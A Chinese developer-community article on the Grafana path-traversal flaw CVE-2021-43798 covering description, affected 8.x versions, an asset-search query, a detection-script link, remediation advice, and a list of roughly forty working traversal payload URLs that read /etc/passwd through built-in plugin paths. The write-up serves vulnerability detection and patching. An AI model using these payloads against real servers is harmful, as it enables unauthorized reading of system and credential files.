AI 助理
备案控制台
开发者社区 大数据 文章 正文

Grafana文件读取漏洞(CVE-2021-43798)

2023-02-13 348
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
本文涉及的产品
可观测可视化 Grafana 版,10个用户账号 1个月
简介: Grafana文件读取漏洞(CVE-2021-43798)

Grafana文件读取漏洞(CVE-2021-43798)

遵纪守法

任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益

漏洞描述

Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。2021年12月6日,国外安全研究人员披露Grafana中某些接口在提供静态文件时,攻击者通过构造恶意请求,可造成目录遍历,读取系统上的文件。

风险等级

高危

影响版本

Grafana 8.x 系列

资产确定

app="grafana"

漏洞检测

检测脚本

https://github.com/j-jasson/CVE-2021-43798-grafana_fileread

plugins

text
alertmanager
grafana
loki
postgres
grafana-azure-monitor-datasource
mixed
prometheus
cloudwatch
graphite
mssql
tempo
dashboard
influxdb
mysql
testdata
elasticsearch
jaeger
opentsdb
zipkin
alertGroups
bargauge
debug
graph
live
piechart
status-history
timeseries
alertlist
candlestick
gauge
heatmap
logs
pluginlist
table
welcome
annolist
canvas
geomap
histogram
news
stat
table-old
xychart
barchart
dashlist
gettingstarted
icon
nodeGraph
state-timeline

payload

/public/plugins/alertlist/../../../../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../../../../etc/passwd
/public/plugins/stackdriver/../../../../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../../../../etc/passwd

开始检测

验证,成功读取文件。

修复方案

v8.0.0-beta1 和 v8.3.0 之间的所有安装都应尽快升级。

如果无法升级,在 Grafana 前运行反向代理来规范化请求的 PATH 将缓解该漏洞。例如,envoy 中的normalize_path设置。

文章标签:
可观测可视化 Grafana 版
数据可视化
网络安全
安全
相关实践学习
通过可观测可视化Grafana版进行数据可视化展示与分析
使用可观测可视化Grafana版进行数据可视化展示与分析。
ckcsec
目录
相关文章
sec0nd
|
监控 安全 数据安全/隐私保护
grafana 目录遍历 (CVE-2021-43798)
grafana 目录遍历 (CVE-2021-43798)
sec0nd
377 0
grafana 目录遍历 (CVE-2021-43798)
weixin_836869520
|
3月前
|
Prometheus 监控 Cloud Native
基于Prometheus和Grafana的监控平台 - 环境搭建
基于Prometheus和Grafana的监控平台 - 环境搭建
weixin_836869520
103 0
蓝易云
|
20天前
|
Prometheus 监控 Cloud Native
自定义grafana_table(数据源Prometheus)
综上所述,自定义 Grafana 表格并将 Prometheus 作为数据源的关键是理解 PromQL 的查询机制、熟悉 Grafana 面板的配置选项,并利用 Grafana 强大的转换和自定义功能使数据展示更为直观和有洞见性。随着对这些工具更深入的了解,您将可以创建出更高级的监控仪表盘,以支持复杂的业务监控需求。
蓝易云
60 1
1288912195458132
|
22天前
|
Prometheus 监控 Cloud Native
prometheus学习笔记之Grafana安装与配置
prometheus学习笔记之Grafana安装与配置
1288912195458132
92 2
郑小健
|
22天前
|
存储 Prometheus 监控
Grafana 与 Prometheus 集成:打造高效监控系统
【8月更文第29天】在现代软件开发和运维领域,监控系统已成为不可或缺的一部分。Prometheus 和 Grafana 作为两个非常流行且互补的开源工具,可以协同工作来构建强大的实时监控解决方案。Prometheus 负责收集和存储时间序列数据,而 Grafana 则提供直观的数据可视化功能。本文将详细介绍如何集成这两个工具,构建一个高效、灵活的监控系统。
郑小健
97 1
土木林森
|
22天前
|
Prometheus 监控 Cloud Native
Spring Boot 性能护航!Prometheus、Grafana、ELK 组合拳,点燃数字化时代应用稳定之火
【8月更文挑战第29天】在现代软件开发中,保证应用性能与稳定至关重要。Spring Boot 作为流行的 Java 框架,结合 Prometheus、Grafana 和 ELK 可显著提升监控与分析能力。Prometheus 负责收集时间序列数据,Grafana 将数据可视化,而 ELK (Elasticsearch、Logstash、Kibana)则管理并分析应用日志。通过具体实例演示了如何在 Spring Boot 应用中集成这些工具:配置 Prometheus 获取度量信息、Grafana 显示结果及 ELK 分析日志,从而帮助开发者快速定位问题,确保应用稳定高效运行。
土木林森
33 1
VipSoft
|
1月前
|
Prometheus Kubernetes 监控
Kubernetes(K8S) 监控 Prometheus + Grafana
Kubernetes(K8S) 监控 Prometheus + Grafana
VipSoft
123 2
游客mldfis24krfue
|
30天前
|
Prometheus 监控 Cloud Native
在Linux中,如何使用Grafana和Prometheus进行网络监控和可视化?
在Linux中,如何使用Grafana和Prometheus进行网络监控和可视化?
游客mldfis24krfue
62 0
小空门123-30335
|
2月前
|
Kubernetes Cloud Native 持续交付
云原生架构的核心组成部分通常包括容器化(如Docker)、容器编排(如Kubernetes)、微服务架构、服务网格、持续集成/持续部署(CI/CD)、自动化运维(如Prometheus监控和Grafana可视化)等。
云原生架构的核心组成部分通常包括容器化(如Docker)、容器编排(如Kubernetes)、微服务架构、服务网格、持续集成/持续部署(CI/CD)、自动化运维(如Prometheus监控和Grafana可视化)等。
小空门123-30335
195 3
久绊A
|
2月前
|
JSON Prometheus 监控
Prometheus+Grafana 部署
Prometheus 和 Grafana 组成监控解决方案。Prometheus 是开源系统监控工具,Grafana 则用于数据可视化。要连接 Prometheus 数据源,登录 Grafana,点击设置,选择“连接”,添加新数据源,选择 Prometheus 类型,并填入 Prometheus 服务器的 HTTP 地址,如 `http://192.168.1.1:9090`,验证连接。之后,从 Grafana 官方仪表板库导入监控面板,如主机监控模板,以可视化系统状态。完成这些步骤后,便建立了有效的监控系统。
久绊A
68 1

热门文章

最新文章

  • 1
    5分钟搭建网站实时分析:Grafana+日志服务实战
  • 2
    阿里云监控grafana数据源使用说明文档
  • 3
    (linux-x86-arm64)麒麟V10安装openjdk+Grafana-7.2.0+Prometheus-2.16.0
  • 4
    7-TDengine集成Grafana实现日志数据可视化
  • 5
    Grafana 利用Grafana Variables变量配置快速切换不同主机的图表数据展示
  • 6
    Apache Doris Grafana监控指标介绍
  • 7
    【Grafana】基于CentOS 7系统安装部署Grafana服务端
  • 8
    【监控利器Prometheus】——Prometheus+Grafana监控服务器资源
  • 9
    Grafana+prometheus变量支持include all设置方法
  • 10
    快速部署Grafana日志监控+Nginx封禁IP
  • 1
    Prometheus+Grafana+NodeExporter 打造一款出色的监控系统,帅呆了!
    141
  • 2
    Nginx+Promtail+Loki+Grafana Nginx日志展示
    209
  • 3
    请问OceanBase社区版能否通过zabbix监控,然后将报错信息展现到grafana?
    57
  • 4
    Grafana Plugin: 支持 jsx 实时渲染的 grafana 面板插件
    213
  • 5
    阿里云Grafana服务支持一键安装Grafana插件
    85
  • 6
    阿里云Grafana服务支持一键安装Grafana插件
    179
  • 7
    「译文」Grafana Loki 简要指南:关于标签您需要了解的一切
    254
  • 8
    「译文」开源日志监控:Grafana Loki 简要指南
    442
  • 9
    Grafana 系列 -Loki- 基于日志实现告警
    243
  • 10
    Grafana 系列 - 统一展示 -12-RED Method Dashboard
    70

    • 相关课程

    更多
  • 可观测Grafana入门课程
  • 最新大版本解读:Grafana 10 新特性 & 新能力

    • 相关电子书

    更多
  • 低代码开发师(初级)实战教程
  • 冬季实战营第三期:MySQL数据库进阶实战
  • 阿里巴巴DevOps 最佳实践手册

    • 相关实验场景

    更多
  • 通过可观测可视化Grafana版进行数据可视化展示与分析

    • 推荐镜像

    更多
  • grafana
  • kubernetes
  • jenkins
    • 下一篇
    基于LNMP搭建WordPress